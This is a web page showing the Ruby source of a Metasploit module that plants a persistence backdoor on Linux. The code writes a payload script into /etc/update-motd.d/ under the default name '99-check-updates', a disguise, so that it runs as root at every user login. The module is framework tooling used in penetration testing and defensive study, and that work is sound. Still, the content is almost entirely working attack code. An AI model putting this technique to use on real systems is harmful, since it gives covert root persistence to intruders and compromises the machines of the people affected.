CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/local/motd_persistence.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7


8
  include Msf::Post::File

9
  include Msf::Post::Unix

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'update-motd.d Persistence',

16
        'Description' => %q{

17
          This module will add a script in /etc/update-motd.d/ in order to persist a payload.

18
          The payload will be executed with root privileges everytime a user logs in.

19
        },

20
        'License' => MSF_LICENSE,

21
        'Author' => [ 'Julien Voisin' ],

22
        'Platform' => [ 'unix', 'linux' ],

23
        'Arch' => ARCH_CMD,

24
        'SessionTypes' => [ 'shell', 'meterpreter' ],

25
        'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => true },

26
        'Targets' => [ ['Automatic', {}] ],

27
        'DefaultTarget' => 0,

28
        'DisclosureDate' => '1999-01-01',

29
        'Notes' => {

30
          'Stability' => [],

31
          'Reliability' => [EVENT_DEPENDENT],

32
          'SideEffects' => [ARTIFACTS_ON_DISK]

33
        },

34
        'References' => [

35
          ['URL', 'https://manpages.ubuntu.com/manpages/oracular/en/man5/update-motd.5.html'],

36
        ]

37
      )

38
    )

39
    register_options([ OptString.new('BACKDOOR_NAME', [true, 'The filename of the backdoor', '99-check-updates']) ])

40
  end

41


42
  def exploit

43
    update_path = '/etc/update-motd.d/'

44


45
    unless exists? update_path

46
      fail_with Failure::BadConfig, "#{update_path} doesn't exist"

47
    end

48


49
    unless writable? update_path

50
      fail_with Failure::BadConfig, "#{update_path} is not writable"

51
    end

52


53
    backdoor_path = File.join(update_path, datastore['BACKDOOR_NAME'])

54


55
    if exists? backdoor_path

56
      fail_with Failure::BadConfig, "#{backdoor_path} is already present"

57
    end

58


59
    write_file(backdoor_path, "#!/bin/sh\n#{payload.encoded}")

60
    chmod(backdoor_path, 0o755)

61
    print_status "#{backdoor_path} written"

62
  end

63
end

64


65